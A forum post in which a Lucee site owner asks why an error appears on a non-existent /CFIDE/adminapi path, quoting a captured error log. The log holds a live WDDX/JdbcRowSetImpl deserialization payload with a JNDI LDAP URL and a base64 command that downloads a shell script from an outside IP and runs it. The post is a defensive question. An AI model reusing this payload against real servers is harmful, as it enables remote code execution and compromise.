Like most web sites, mine is often hit with attacks probing for vulnerabilities. Normally these result in 404 errors.
Recently I have had some try and load /CFIDE/adminapi/base.cfc
There is no such folder and when I try that folder, I get a custom 404 error page and no Lucee error. However, I have also caught this Lucee error when the attacker at 213.109.147.242 loaded the page.
lucee.runtime.interpreter.InterpreterException: Syntax Error, Invalid Construct at line [1] / column [1] / position [1] in the JSON 1: <wddxPacket version='1.0'><header/><data><struct type='Ecom.sun.rowset.JdbcRowSetImplE'><var name='dataSourceName'><string>ldap://166.108.229.166:8089/CommonsBeanutils1/base64/KGN1cmwgLXNTZmsgaHR0cDovLzE2Ni4xMDguMjI5LjE2Njo4MDg4L3NlcnZpY2Uuc2ggfHwgd2dldCAtcSAtTy0gaHR0cDovLzE2Ni4xMDguMjI5LjE2Njo4MDg4L3NlcnZpY2Uuc2gpIHwgc2g=</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket> ^ at lucee.runtime.interpreter.CFMLExpressionInterpreter.createSyntaxException(CFMLExpressionInterpreter.java:285)
My question is, how can Lucee have an error on a non-existent page, and is this a Lucee vulnerability?
OS: Windows Server 2025
Java Version: 21.0.6
Tomcat Version: 9.0.104
Lucee Version: 6.2.0.321
2 posts - 2 participants
